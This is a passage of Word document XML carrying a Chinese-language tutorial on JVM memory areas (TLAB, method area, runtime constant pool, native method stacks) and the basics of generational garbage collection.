          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>），其大小由</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>根据运行的情况计算而得，在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>TLAB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>上分配对象时不需要加锁，因此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>在给线程的对象分配内存时会尽量的在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>TLAB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>上分配，在这种情况下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>中分配对象内存的性能和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>基本是一样高效的，但如果对象过大的话则仍然是直接使用堆空间分配</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:ind w:left="601"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（3）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t>      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>TLAB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>仅作用于新生代的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Eden Space</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，因此在编写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>程序时，通常多个小的对象比大的对象分配起来更加高效。</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Style w:val="a9"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>第四块：方法区域（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Method Area</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）</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Fonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Sun JDK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>中这块区域对应的为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>PermanetGeneration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，又称为持久代。</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Fonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）方法区域存放了所加载的类的信息（名称、修饰符等）、类中的静态变量、类中定义为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>类型的常量、类中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Field</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>信息、类中的方法信息，当开发人员在程序中通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Class</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Fonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>对象中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>getName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>isInterface</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>等方法来获取信息时，这些数据都来源于方法区域，同时方法区域也是全局共享的，在一定的条件下它也会被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>GC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，当方法区域需要使用的内存超过其允许的大小时，会抛出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>OutOfMemory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的错误信息。</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Style w:val="a9"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>第五块：运行时常量池（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Runtime Constant Pool</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）</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Fonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>存放的为类中的固定的常量信息、方法和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Field</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的引用信息等，其空间从方法区域中分配。</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Style w:val="a9"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>第六块：本地方法堆栈（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Native Method Stacks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）</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Fonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>采用本地方法堆栈来支持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>native</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>方法的执行，此区域用于存储每个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>native</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>方法调用的状态。</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Style w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:ind w:left="351"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>六、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t>        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>垃圾回收</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Style w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>GC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的基本原理：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>将内存中不再被使用的对象进行回收，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>GC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>中用于回收的方法称为收集器，由于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>GC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>需要消耗一些资源和时间，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>在对对象的生命周期特征进行分析后，按照新生代、旧生代的方式来对对象进行收集，以尽可能的缩短</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>GC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>对应用造成的暂停</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Fonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）对新生代的对象的收集称为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>minor GC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>；</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Fonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）对旧生代的对象的收集称为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Full GC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>；</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Fonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）程序中主动调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>System.gc()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>强制执行的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>GC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Full GC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>。</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Style w:val="a9"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>不同的对象引用类型，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
